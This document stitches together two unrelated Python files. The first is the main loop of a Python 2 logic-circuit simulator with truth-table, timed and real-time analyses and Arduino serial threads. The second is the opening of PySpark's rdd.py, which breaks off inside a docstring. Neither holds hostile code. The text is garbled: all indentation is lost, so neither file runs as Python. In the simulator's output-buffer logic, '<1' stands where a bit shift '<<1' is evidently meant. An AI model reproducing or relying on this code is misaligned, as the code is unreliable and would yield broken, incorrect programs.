if con.PRINT_NODE_INDEX!=[]:
pd.real_time_print()
elif con.PLOT_NODE!=[]:
temp_data_plot=[]
temp_data_plot.append(con.current_time-con.start_time)
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
pd.animate_plot_nodes(temp_data_plot)
except:
con.circuit_simulation_flag=False
###########################################################################################################################
def circuit_simulation(lock):
try:
while con.circuit_simulation_flag:
lock.acquire()
simulator()
lock.release()
except:
con.circuit_simulation_flag=False
###########################################################################################################################
def arduino_python_serial_communication_in(lock):
try:
while con.serial_communication_flag:
ad.arduino2python(lock)
except:
exit()
###########################################################################################################################
def arduino_python_serial_communication_out(lock):
try:
while con.serial_communication_flag:
ad.python2arduino(lock)
except:
exit()
###########################################################################################################################
def input_thread(a_list):
raw_input()
a_list.append(True)
con.end_time=time.clock()
###########################################################################################################################
def gate_operate(gate,NODE_DATA):
if gate[0]=="BUFFER":
NODE_DATA[gate[2]][2]=gt.BUFFER(NODE_DATA[gate[1]][2])
elif gate[0]=="TRISTATE_BUFFER":
NODE_DATA[gate[3]][2]=gt.TRISTATE_BUFFER(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2],NODE_DATA[gate[3]][2])
elif gate[0]=="AND_2":
NODE_DATA[gate[3]][2]=gt.AND_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="OR_2":
NODE_DATA[gate[3]][2]=gt.OR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="NOT":
NODE_DATA[gate[2]][2]=gt.NOT(NODE_DATA[gate[1]][2])
elif gate[0]=="NAND_2":
NODE_DATA[gate[3]][2]=gt.NAND_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="NOR_2":
NODE_DATA[gate[3]][2]=gt.NOR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="XOR_2":
NODE_DATA[gate[3]][2]=gt.XOR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
elif gate[0]=="XNOR_2":
NODE_DATA[gate[3]][2]=gt.XNOR_2(NODE_DATA[gate[1]][2],NODE_DATA[gate[2]][2])
return NODE_DATA
###########################################################################################################################
def input_values_generator(INPUT_VARIABLES_COUNT):
INPUT_DATA=[]
for count in range(2**INPUT_VARIABLES_COUNT):
binary=bin(count)
binary=list(binary)
binary=binary[2:]
for b in range(len(binary)):
binary[b]=eval(binary[b])
for b in range(INPUT_VARIABLES_COUNT-len(binary)):
binary.insert(0,0)
INPUT_DATA.append(binary)
return INPUT_DATA
###########################################################################################################################
def simulator():
for gate in con.MAINCKT_DATA:
con.NODE_DATA=gate_operate(gate,con.NODE_DATA)
for tb_index in con.tristate_buffer_list:
set_op0_flag=1
tb_enable_list=tb_index[1:]
for tb_en_index in tb_enable_list:
if con.NODE_DATA[tb_en_index][2]==1:
set_op0_flag=0
break
if set_op0_flag==1:
con.NODE_DATA[tb_index[0]][2]=0
temp_connect_out_buff_data=0
if con.BOARD_INFO!=None and con.tristate_buffer_list!=[]:
for pin_index in con.BOARD_OUTPUT:
if pin_index[2]=='n.c.':
temp_connect_out_buff_data=temp_connect_out_buff_data<1
else:
temp_flag=True
for tb_en in pin_index[2]:
if con.NODE_DATA[tb_en][2]==1:
temp_flag=False
break
if temp_flag==True:
temp_connect_out_buff_data=(temp_connect_out_buff_data<1) | 1
else:
temp_connect_out_buff_data=temp_connect_out_buff_data<1
con.DDR_DATA=con.ddr_DATA & (temp_connect_out_buff_data ^ 65535)
else:
con.DDR_DATA=con.ddr_DATA
def main():
###########################################################################################################################
con.initialize()
sd.def_subckt()
rc.scan_code(con.CODE_DATA)
cc.circuit_construct()
fns.functional_indexing()
###########################################################################################################################
analyd.display_start_data()
###########################################################################################################################
if con.BOARD_INFO!=None:
ad.initialize_arducom()
###########################################################################################################################
lock=threading.Lock()
circuit_simulation_thread=threading.Thread(target=circuit_simulation,args=(lock,))
real_time_circuit_simulation_thread=threading.Thread(target=real_time_circuit_simulation,args=(lock,))
arduino_python_serial_communication_in_thread=threading.Thread(target=arduino_python_serial_communication_in,args=(lock,))
arduino_python_serial_communication_out_thread=threading.Thread(target=arduino_python_serial_communication_out,args=(lock,))
clocking_thread=threading.Thread(target=clocking)
###########################################################################################################################
if con.BOARD_INFO!=None:
arduino_python_serial_communication_in_thread.start()
arduino_python_serial_communication_out_thread.start()
if con.scan_sampling_time<0.03:
con.scan_sampling_time=0.03
###########################################################################################################################
analyd.detdisplay_ANALYSIS_data()
analyd.start_mcktstp_sim()
###########################################################################################################################
if con.MAINCKT_SETUP_NODE_INDEX!=[]:
if con.ANALYSIS_DATA==None:
for i in con.PRINT_NODE:
if i !='time':
print i,"\t",
else:
print "ms.\t",
print ""
else:
mcktstp_file_data=""
for i in con.PRINTF_NODE:
if i !='time':
mcktstp_file_data=mcktstp_file_data+str(i)+"\t"
else:
mcktstp_file_data=mcktstp_file_data+"ms.\t"
con.ANALYSIS_DATA.write(mcktstp_file_data+"\n")
mcktstp_index=0
con.start_time=time.clock()
con.last_time=con.start_time
###########################################################################################################################
while con.MAINCKT_SETUP_NODE_INDEX!=[] and con.SETUP_DATA!=[]:
if con.mcktstp_time_flag==1:
if clock_flaging(con.SETUP_DATA[mcktstp_index+1][0]):
mcktstp_index+=1
if mcktstp_index==(len(con.SETUP_DATA)-1):
break
else:
con.current_time=time.clock()
if (con.current_time-con.last_time)>=con.scan_sampling_time:
mcktstp_index+=1
con.last_time=con.current_time
if mcktstp_index==len(con.SETUP_DATA):
break
lock.acquire()
for input_index in range(len(con.MAINCKT_SETUP_NODE_INDEX)):
con.NODE_DATA[con.MAINCKT_SETUP_NODE_INDEX[input_index]][2]=con.SETUP_DATA[mcktstp_index][input_index+con.mcktstp_time_flag]
lock.release()
temp_data_print=[]
mcktstp_file_data=""
simulator()
if con.BOARD_INFO!=None:
time.sleep(con.serial_sync_time)
if con.ANALYSIS_DATA==None:
for mainckt_setup_index in con.PRINT_NODE_INDEX:
if mainckt_setup_index!='time':
temp_data_print.append(int(con.NODE_DATA[mainckt_setup_index][-1]))
else:
temp_data_print.append(round((con.current_time*1000),1))
else:
for mainckt_setup_index in con.PRINTF_NODE_INDEX:
if mainckt_setup_index!='time':
mcktstp_file_data=mcktstp_file_data+str((int(con.NODE_DATA[mainckt_setup_index][-1])))+"\t"
else:
mcktstp_file_data=mcktstp_file_data+str(round((con.current_time*1000),1))+"\t"
if con.ANALYSIS_DATA==None:
con.MAINCKT_PRINT_ARRAY.append(temp_data_print)
else:
con.ANALYSIS_DATA.write(mcktstp_file_data+"\n")
###########################################################################################################################
if con.PRINT_NODE!=[]:
for display_data in con.MAINCKT_PRINT_ARRAY:
for data in display_data:
print data,"\t",
print ""
###########################################################################################################################
analyd.start_sim()
###########################################################################################################################
if con.ANALYSIS=="TT_ANALYSIS":
con.MAXIMUM_SIMULATION_COUNT=1
if con.TRUTH_TABLE_INPUT_DATA_FILE==None:
con.INPUT_VARIABLES_VALUE=input_values_generator(con.INPUT_VARIABLES_COUNT)
con.start_time=time.clock()
###########################################################################################################################
if con.tt_time_flag==0:
###########################################################################################################################
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=''
for i in con.PRINTF_NODE:
if i != 'time':
time_file_data=time_file_data+str(i)+"\t"
else:
time_file_data=time_file_data+"ms.\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
if con.PRINT_NODE!=[]:
temp_data_print=[]
for i in con.PRINT_NODE:
if i != 'time':
temp_data_print.append(i)
else:
temp_data_print.append('ms.')
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
for tt_index in range(len(con.INPUT_VARIABLES_VALUE)):
for input_index in range(len(con.INPUT_NODE_INDEX)):
con.NODE_DATA[con.INPUT_NODE_INDEX[input_index]][2]=con.INPUT_VARIABLES_VALUE[tt_index][input_index]
simulator()
if con.BOARD_INFO!=None:
time.sleep(con.scan_sampling_time)
temp_data_print=[]
con.current_time=time.clock()
lock.acquire()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
temp_data_print.append(int(con.NODE_DATA[print_node_index][-1]))
else:
temp_data_print.append(round(((con.current_time-con.start_time)*1000),1))
lock.release()
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=""
lock.acquire()
for printf_node_index in con.PRINTF_NODE_INDEX:
if printf_node_index!='time':
time_file_data=time_file_data+str(int(con.NODE_DATA[printf_node_index][-1]))+"\t"
else:
time_file_data=time_file_data+str(round(((con.current_time-con.start_time)*1000),1))+"\t"
lock.release()
con.ANALYSIS_DATA.write(time_file_data+"\n")
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
con.end_time=time.clock()
###########################################################################################################################
else:
con.start_time=time.clock()
con.last_time=con.start_time
circuit_simulation_thread.start()
###########################################################################################################################
temp_data_print=[]
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=''
for i in con.PRINTF_NODE:
if i != 'time':
time_file_data=time_file_data+str(i)+"\t"
else:
time_file_data=time_file_data+"ms.\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
if con.PRINT_NODE!=[]:
temp_data_print=[]
for i in con.PRINT_NODE:
if i != 'time':
temp_data_print.append(i)
else:
temp_data_print.append('ms.')
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
tt_index=0
###########################################################################################################################
while con.circuit_simulation_flag:
if clock_flaging(con.INPUT_VARIABLES_VALUE[tt_index+1][0]):
tt_index+=1
if tt_index==(len(con.INPUT_VARIABLES_VALUE)-1):
con.end_time=time.clock()
con.circuit_simulation_flag=False
circuit_simulation_thread.join()
break
lock.acquire()
for input_index in range(len(con.INPUT_NODE_INDEX)):
con.NODE_DATA[con.INPUT_NODE_INDEX[input_index]][2]=con.INPUT_VARIABLES_VALUE[tt_index][input_index+con.tt_time_flag]
lock.release()
if con.BOARD_INFO!=None:
time.sleep(con.serial_sync_time)
###########################################################################################################################
temp_data_print=[]
temp_data_plot=[]
temp_data_plot.append(con.current_time-con.start_time)
lock.acquire()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
temp_data_print.append(int(con.NODE_DATA[print_node_index][-1]))
else:
temp_data_print.append(round(((con.current_time-con.start_time)*1000),1))
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
lock.release()
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=""
lock.acquire()
for printf_node_index in con.PRINTF_NODE_INDEX:
if printf_node_index!='time':
time_file_data=time_file_data+str(int(con.NODE_DATA[printf_node_index][-1]))+"\t"
else:
time_file_data=time_file_data+str(round(((con.current_time-con.start_time)*1000),1))+"\t"
lock.release()
con.ANALYSIS_DATA.write(time_file_data+"\n")
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
con.PLOT_DATA.append(temp_data_plot)
###########################################################################################################################
if con.PRINT_NODE!=[]:
for display_data in con.TIME_ANALYSIS_DATA_ARRAY:
for data in display_data:
print data,"\t",
print ""
if con.PLOT_NODE!=[] and con.tt_time_flag!=0:
pd.plot_nodes()
###########################################################################################################################
elif con.ANALYSIS=="OT_ANALYSIS":
con.MAXIMUM_SIMULATION_COUNT=5
if con.SCAN_NODE!=[]:
print "\n-Scanning Node Voltages-\n"
for scan_node_index in con.SCAN_NODE_INDEX:
temp_store=raw_input(str(con.NODE_DATA[scan_node_index][0])+" : ")
if con.is_number(temp_store):
temp_store=eval(temp_store)
if temp_store!=0 and temp_store!=1:
eh.display_error(0,0,-1,temp_store)
else:
con.NODE_DATA[scan_node_index][2]=temp_store
else:
eh.display_error(con.ANALYSIS,0,-2,temp_store)
con.start_time=time.clock()
if con.PRINT_NODE!=[]:
print "\n-Printing Node Voltages-\n"
for i in con.PRINT_NODE:
if i != 'time':
print i,'\t',
else:
print 'ms.','\t',
print ""
for simulation_counter in range(con.MAXIMUM_SIMULATION_COUNT):
time.sleep(con.scan_sampling_time)
simulator()
con.end_time=time.clock()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index != 'time':
print int(con.NODE_DATA[print_node_index][-1]),'\t',
else:
print round(((time.clock()-con.start_time)*1000),1),'\t',
print "\n"
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
temp_data_print=""
for i in con.PRINTF_NODE:
temp_data_print=temp_data_print+str(i)+'\t'
temp_data_print=temp_data_print+'\n'
for printf_node_index in con.PRINTF_NODE_INDEX:
temp_data_print=temp_data_print+str(int(con.NODE_DATA[printf_node_index][-1]))+'\t'
con.ANALYSIS_DATA.write(temp_data_print+'\n')
###########################################################################################################################
elif con.ANALYSIS=="RT_ANALYSIS":
con.start_time=time.clock()
con.last_time=con.start_time
con.MAXIMUM_SIMULATION_COUNT=1
if con.PRINT_NODE!=[]:
pd.real_time_print_setup()
elif con.PLOT_NODE!=[]:
pd.animate_plot_nodes_setup()
real_time_circuit_simulation_thread.start()
###########################################################################################################################
scan_cycle_counter=1
while con.circuit_simulation_flag:
if con.SCAN_NODE!=[]:
print "\n-Scanning Node Voltages-\n"
print "# Scan cycle :",scan_cycle_counter
for scan_node_index in con.SCAN_NODE_INDEX:
temp_store=raw_input(str(con.NODE_DATA[scan_node_index][0])+" : ")
if not(con.circuit_simulation_flag):
eh.display_error(0,0,-6,0)
elif con.is_number(temp_store):
temp_store=eval(temp_store)
if temp_store!=0 and temp_store!=1:
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
eh.display_error(0,0,-1,temp_store)
else:
con.NODE_DATA[scan_node_index][2]=temp_store
else:
if temp_store=='':
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
break
else:
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
eh.display_error(con.ANALYSIS,0,-2,temp_store)
else:
_=raw_input()
if not(con.circuit_simulation_flag):
eh.display_error(0,0,-6,0)
con.circuit_simulation_flag=False
real_time_circuit_simulation_thread.join()
con.end_time=time.clock()
break
scan_cycle_counter+=1
time.sleep(con.scan_sampling_time)
###########################################################################################################################
elif con.ANALYSIS=="TIME_ANALYSIS":
con.MAXIMUM_SIMULATION_COUNT=1
con.start_time=time.clock()
con.last_time=con.start_time
con.current_time=con.start_time
###########################################################################################################################
if con.TOTAL_SIMULATION_TIME==None:
if con.PLOT_NODE!=[]:
pd.animate_plot_nodes_setup()
a_list=[]
thread.start_new_thread(input_thread,(a_list,))
###########################################################################################################################
while not a_list:
lock.acquire()
clocking()
simulator()
lock.release()
if con.PLOT_NODE!=[]:
temp_data_plot=[]
temp_data_plot.append(con.current_time-con.start_time)
lock.acquire()
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
lock.release()
pd.animate_plot_nodes(temp_data_plot)
if con.PRINT_NODE!=[]:
lock.acquire()
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
print int(con.NODE_DATA[print_node_index][-1]),"\t",
else:
print round(((con.current_time-con.start_time)*1000),1),"\t",
lock.release()
print ""
###########################################################################################################################
else:
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=''
for i in con.PRINTF_NODE:
if i != 'time':
time_file_data=time_file_data+str(i)+"\t"
else:
time_file_data=time_file_data+"ms.\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
if con.PRINT_NODE!=[]:
temp_data_print=[]
for i in con.PRINT_NODE:
if i != 'time':
temp_data_print.append(i)
else:
temp_data_print.append('ms.')
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
while True:
clocking()
simulator()
temp_data_print=[]
temp_data_plot=[]
if con.BOARD_INFO!=None:
time.sleep(con.serial_sync_time)
temp_data_plot.append(con.current_time-con.start_time)
for print_node_index in con.PRINT_NODE_INDEX:
if print_node_index!='time':
temp_data_print.append(int(con.NODE_DATA[print_node_index][-1]))
else:
temp_data_print.append(round(((con.current_time-con.start_time)*1000),1))
for plot_node_index in con.PLOT_NODE_INDEX:
temp_data_plot.append(int(con.NODE_DATA[plot_node_index][-1]))
if con.ANALYSIS_DATA!=None and con.PRINTF_NODE!=[]:
time_file_data=""
for printf_node_index in con.PRINTF_NODE_INDEX:
if printf_node_index!='time':
time_file_data=time_file_data+str(int(con.NODE_DATA[printf_node_index][-1]))+"\t"
else:
time_file_data=time_file_data+str(round(((con.current_time-con.start_time)*1000),1))+"\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
con.PLOT_DATA.append(temp_data_plot)
if (con.current_time-con.start_time)>=con.TOTAL_SIMULATION_TIME:
con.end_time=time.clock()
break
if con.PRINT_NODE!=[]:
for display_data in con.TIME_ANALYSIS_DATA_ARRAY:
for data in display_data:
print data,"\t",
print ""
if con.PLOT_NODE!=[]:
pd.plot_nodes()
###########################################################################################################################
con.clocking_flag=False
con.circuit_simulation_flag=False
con.serial_communication_flag=False
print "-SIMULATION ENDED-"
print "-total simulation time :",((con.end_time-con.start_time)*1000),'ms'
if con.ANALYSIS_DATA!=None:
con.ANALYSIS_DATA.write("\n-SIMULATION ENDED-\n")
con.ANALYSIS_DATA.write("-total simulation time :"+str((con.end_time-con.start_time)*1000)+' ms')
con.ANALYSIS_DATA.close()
_=raw_input()
###########################################################################################################################
main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from collections import namedtuple
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
import traceback
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
from random import Random
from math import sqrt, log
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def _extract_concise_traceback():
"""
This function returns the traceback info for a callsite, returns a dict
with function name, file name and line number
"""
tb = traceback.extract_stack()
callsite = namedtuple("Callsite", "function file linenum")
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return callsite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame-1]
return callsite(function=sfun, file=ufile, linenum=uline)
_spark_stack_depth = 0
class _JavaStackTrace(object):
def __init__(self, sc):
tb = _extract_concise_traceback()
if tb is not None:
self._traceback = "%s at %s:%s" % (tb.function, tb.file, tb.linenum)
else:
self._traceback = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
global _spark_stack_depth
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(self._traceback)
_spark_stack_depth += 1
def __exit__(self, type, value, tb):
global _spark_stack_depth
_spark_stack_depth -= 1
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
class MaxHeapQ(object):
"""
An implementation of MaxHeap.
>>> import pyspark.rdd
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(10)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(1)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> heap.getElements()
[0]
"""
def __init__(self, maxsize):
# we start from q[1], this makes calculating children as trivial as 2 * k
self.q = [0]
self.maxsize = maxsize
def _swim(self, k):
while (k > 1) and (self.q[k/2] < self.q[k]):
self._swap(k, k/2)
k = k/2
def _swap(self, i, j):
t = self.q[i]
self.q[i] = self.q[j]
self.q[j] = t
def _sink(self, k):
N = self.size()
while 2 * k <= N:
j = 2 * k
# Here we test if both children are greater than parent
# if not swap with larger one.
if j < N and self.q[j] < self.q[j + 1]:
j = j + 1
if(self.q[k] > self.q[j]):
break
self._swap(k, j)
k = j
def size(self):
return len(self.q) - 1
def insert(self, value):
if (self.size()) < self.maxsize:
self.q.append(value)
self._swim(self.size())
else:
self._replaceRoot(value)
def getElements(self):
return self.q[1:]
def _replaceRoot(self, value):
if(self.q[1] > value):
self.q[1] = value
self._sink(1)
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self._jrdd.cache()
return self
def persist(self, storageLevel):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
else:
return None
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(split, iterator): return imap(f, iterator)
return PipelinedRDD(self, func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator): return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator): return f(iterator)
return self.mapPartitionsWithIndex(func)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.splits().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator): return ifilter(f, iterator)
return self.mapPartitions(func)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD (relies on numpy and falls back
on default random generator if numpy is unavailable).
>>> sc.parallelize(range(0, 100)).sample(False, 0.1, 2).collect() #doctest: +SKIP
[2, 3, 20, 21, 24, 41, 42, 66, 67, 89, 90, 98]
"""
assert fraction >= 0.0, "Invalid fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD (currently requires
numpy).
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError("Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
